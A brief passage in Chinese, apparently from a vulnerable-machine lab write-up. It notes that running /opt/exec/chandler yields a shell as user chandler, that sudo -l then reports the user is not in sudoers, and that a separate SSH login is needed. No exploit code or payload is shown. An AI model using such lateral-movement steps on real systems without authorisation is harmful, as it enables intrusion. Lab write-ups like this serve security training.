通过执行/opt/exec/chandler程序时,虽然得到了chandler的shell, 但是执行sudo -l却告知不在sudoers组中,比较奇怪,需要另外SSH登录chandler的shell
-
本靶机基本上按照作者一步一步给出的提示进行即可。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
